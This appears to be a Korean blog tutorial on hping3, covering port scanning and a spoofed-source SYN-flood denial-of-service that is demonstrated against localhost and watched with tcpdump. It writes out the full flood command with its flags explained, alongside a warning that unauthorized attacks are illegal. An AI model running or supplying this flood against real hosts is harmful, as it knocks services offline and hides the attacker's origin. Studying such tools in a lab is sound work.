티스토리 뷰



  hping3를 이용한 포트 스캔 및 DDOS 공격


hping은 TCP/IP 프로토콜을 사용하는 서버 및 네트워크 환경을 분석하거나 공격할 수 있는 패킷 생성기이자
분석도구 이다.  hping3는 최신버전


  hping3를 이용한 포트 스캔

hping3는 특정 IP에서 Listening중인 포트를 확인할 수 있는 포트 스캔( port scan ) 기능을 지원한다.

특정 ip에 대하여 포트 스캔을 1~1024번 TCP 포트까지 Syb Flag( -S )를 세팅하여 수행한 경우이다.



  hping3를 이용한 DDOS 공격

  

   <허가되지 않는 공격은 범법행위 입니다!>


hping3 --rand-source 127.0.0.1 -p 80 -S --flood


--rand-source : 발신자의 ip를 무작위로 생성

127.0.0.1      : 타겟의 ip

-p 80          : 포트번호 80

-S --flood    : syn packet을 계속 보낸다.


↑ root@kali:~# ifconfig  // ifconfing 명령을 통해 현재 네트워크 인터페이스 상태를 볼 수 있다.

   # 타겟으로 지정된 것은 인터페이스 lo


↑ root@kali:~# tcpdump -i [인터페이스 명]  // tcpdump는 네트워크 패킷을 엿볼 수 있다. ( 스니핑 기능 )



↑ root@kali:~# tcpdump -i lo  // 인터페이스 lo의 패킷을 보고 있다.



↑ root@kali:~# hping3 --rand-source 127.0.0.1 -p 80 -S --flood  // 타겟 127.0.0.1에 DDos 공격을 실행중

    # 127.0.0.1 에게 가는 막대한 양의 패킷을 볼 수 있다.